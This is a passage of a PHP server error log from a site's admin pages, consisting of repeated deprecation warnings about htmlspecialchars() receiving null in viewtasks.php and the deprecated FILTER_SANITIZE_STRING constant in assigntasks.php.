htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:25:23 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:25:31 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:25:51 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:33:27 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:33:37 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:33:50 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:34:22 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:36:32 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:37:01 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:37:18 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:37:59 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:38:12 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:38:35 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:38:48 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:39:21 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:39:32 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:40:10 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:40:26 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:41:19 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:41:39 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:42:15 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:42:22 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:43:32 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:43:42 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:43:55 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:44:07 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:44:27 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:44:40 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:45:04 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:45:19 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:45:30 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:46:06 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is 